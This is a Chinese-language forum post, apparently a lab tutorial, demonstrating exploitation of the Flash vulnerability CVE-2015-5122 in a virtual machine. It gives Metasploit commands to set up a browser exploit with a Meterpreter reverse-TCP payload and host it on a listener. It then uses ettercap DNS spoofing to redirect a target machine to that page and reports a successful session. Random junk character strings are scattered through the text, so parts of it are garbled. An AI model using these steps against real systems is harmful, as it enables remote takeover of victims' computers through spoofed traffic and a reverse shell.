cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

N$ _9 z+ r x 二、cve2015-5122漏洞实例演示虚拟机 7 q+ M: A2 N; k+ [3 x0 I* p( l

) _ q1 ^! f% n$ [( O1 r. a4 c, [ 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： # a* x$ v) ~7 j9 t

- V8 P5 w6 P% L( A# N6 @ search cve-2015-5122如图： 9 K* \4 \, B C0 C8 o$ O2 `9 _

" E/ Y R( @' r Q( y. K5 H4 A# M4 x$ y3 {

, v' ~* ~6 O' j$ K 下面我们敲如下命令： + B3 t5 z2 D: z4 f! J1 c

3 Q) i3 g$ a' Y; k( s) n% R3 V use exploit/multi/browser/adobe_flash_opaque_background_uaf / A( l, h! h0 s+ o! l4 e! L" m

1 O8 J* L- n* I& [ set PAYLOAD windows/meterpreter/reverse_tcp & N+ c7 Z! r7 R

( f' e1 q2 A2 i' V8 c+ { set LHOST 192.168.0.109 : K- b, C% k- r8 @

# p, B- o9 k" F8 u6 U, P set URIPATH / /*根目录*/ 7 }3 X( Q L5 U

( E' C6 Z( p5 V, x set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 # |( z' q( m7 g

$ M0 M' p Q- `1 s set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 - J! i; u, ]* D

7 Q5 L" Y7 x% W* y q/ P0 O 然后show options如图： : d' U2 m. C' Y$ v5 U2 W+ ?

! K6 {6 u/ I, @- G4 r( ^: p6 | ; N9 y7 V2 l- R" U

+ S9 C$ u `! g& D0 | 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
: {# b8 h4 T& ? ; G! H8 k$ M2 _! S1 e; h3 A

+ `! T: y! r7 P$ ]; y9 s 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 + A9 w+ H; l! i% y5 n) [

9 Q5 e: d5 Z# z- k0 _ Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf 0 e, Z# c, f9 ?

: n( J6 w1 r( t0 P: n* ? . L# _; K Q' n5 s: r

1 p3 Q6 q R) K: B- q5 T 成功了，这时候我们断开ettercap，如图： 0 M- d7 s' b8 Q! Q6 X% q! D

4 k1 A: ~7 }3 g- A$ B 3 s, W9 g4 m0 i2 p. L

' R6 {& c7 d4 h* W i" b$ J Screenshot如图： . V+ ^" @$ Y& e- s2 e

$ X3 ~5 z* h# y6 j P/ T & r. A8 P6 ~/ U" n8 N/ |0 f

0 n$ E; E8 r8 R7 u2 \$ q; k 2 h$ U8 f4 v. W s* |" @ [

		自动登录	找回密码
密码			立即注册

cve2015-5122漏洞实例演示虚拟机

浏览过的版块